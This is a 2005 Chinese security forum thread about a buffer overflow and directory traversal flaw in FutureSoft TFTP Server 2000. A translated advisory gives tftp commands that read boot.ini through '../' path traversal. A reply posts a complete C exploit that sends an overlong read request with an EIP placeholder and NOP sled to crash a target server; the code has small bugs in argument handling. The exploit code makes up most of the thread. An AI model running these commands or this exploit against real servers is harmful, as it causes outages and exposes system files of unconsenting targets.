Board logo

标题: FutureSoft TFTP Server 2000缓冲溢出让远程用户执行任意代码并且暴露任何文件 [打印本页]
作者: Jesse    时间: 2005-6-5 11:18     标题: FutureSoft TFTP Server 2000缓冲溢出让远程用户执行任意代码并且暴露任何文件


翻译网站:  Bug.Center.Team http://www.cnbct.org
SecurityTracker ID: 1014079
CVE 参考:  GENERIC-MAP-NOMATCH
日期:      2005 年5月31 日
漏洞发现: SIG^2
影响版本: 1.0.0.1
摘要:FutureSoft TFTP 服务器2000存在一个漏洞。远程用户能观看目标系统任意文件,执行任意代码。远程用户能够发送包含特殊处理的文件名或转移字符串的TFTP读的请求(RRQ) 或写请求(WRQ)的小包,引起缓冲溢出和重写SEH和EIP寄存器。能够以本地系统权限运行任意代码.
漏洞示范:
如下为目录遍历的部分代码
tftp -i [target] GET ../../../../../boot.ini
tftp -i [target] GET ..\\..\\..\\..\\..\\boot.ini
厂商地址:  www.futuresoft.com/products/lit-tftp2000.htm
作者: 千與千尋    时间: 2005-6-5 17:12     标题: FutureSoft TFTP Server 2000缓冲溢出让远程用户执行任意代码并且暴露任何文件

EXP
  1. /*
  2. *
  3. * FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
  4. * http://www.futuresoft.com/products/lit-tftp2000.htm
  5. * Bug Discovered by SIG^2 (http://www.security.org.sg)
  6. * Exploit coded By ATmaCA
  7. * Web: atmacasoft.com && spyinstructors.com
  8. * E-Mail: atmaca@icqmail.com
  9. * Credit to kozan
  10. * Usage:tftp_exp <targetIp> [targetPort]
  11. *
  12. */
  13. /*
  14. *
  15. * Vulnerable Versions:
  16. * TFTP Server 2000 Evaluation Version 1.0.0.1
  17. *
  18. */
  19. &#35;include <windows.h>
  20. &#35;include <stdio.h>
  21. &#35;pragma comment(lib, "ws2_32.lib")
  22. /* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
  23. char expbuffer[] =
  24. "\x00\x01"
  25. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  26. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  27. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  28. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  29. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  30. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  31. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  32. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  33. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  34. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  35. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  36. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  37. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  38. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  39. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  40. "\x58\x58\x58\x58" /* EIP */
  41. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"
  42. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  43. "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"
  44. "\x69\x00";
  45. void main(int argc, char *argv[])
  46. {
  47. WSADATA wsaData;
  48. WORD wVersionRequested;
  49. struct hostent *pTarget;
  50. struct sockaddr_in sock;
  51. SOCKET mysocket;
  52. int destPORT = 69;//Default to 69
  53. if (argc < 2){
  54. printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n");
  55. printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");
  56. printf("Bug Discovered by SIG^2 (http://www.security.org.sg)\n");
  57. printf("Exploit coded By ATmaCA\n");
  58. printf("Web: atmacasoft.com && spyinstructors.com\n");
  59. printf("E-Mail: atmaca@icqmail.com\n");
  60. printf("Credit to kozan\n");
  61. printf("Usage:tftp_exp <targetIp> [targetPort]\n");
  62. return;
  63. }
  64. if (argc==3)
  65. destPORT=atoi(argv[2]);
  66. printf("Requesting Winsock...\n");
  67. wVersionRequested = MAKEWORD(1, 1);
  68. if (WSAStartup(wVersionRequested, &wsaData) < 0) {
  69. printf("No winsock suitable version found!");
  70. return;
  71. }
  72. mysocket = socket(AF_INET, SOCK_DGRAM, 0);
  73. if(mysocket==INVALID_SOCKET){
  74. printf("Can';t create UDP socket\n");
  75. exit(1);
  76. }
  77. printf("Resolving Hostnames...\n");
  78. if ((pTarget = gethostbyname(argv[2])) == NULL){
  79. printf("Resolve of %s failed\n", argv[1]);
  80. exit(1);
  81. }
  82. memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
  83. sock.sin_family = AF_INET;
  84. sock.sin_port = htons(destPORT);
  85. printf("Connecting...\n");
  86. if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
  87. printf("Couldn';t connect to host.\n");
  88. exit(1);
  89. }
  90. printf("Connected!...\n");
  91. Sleep(10);
  92. printf("RRQ->Sending packet. Size: %d\n",sizeof(expbuffer));
  93. if (send(mysocket,expbuffer, sizeof(expbuffer)+1, 0) == -1){
  94. printf("Error sending packet\n");
  95. closesocket(mysocket);
  96. exit(1);
  97. }
  98. printf("Packet sent........\n");
  99. printf("Success.\n");
  100. closesocket(mysocket);
  101. WSACleanup();
  102. }
复制代码




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2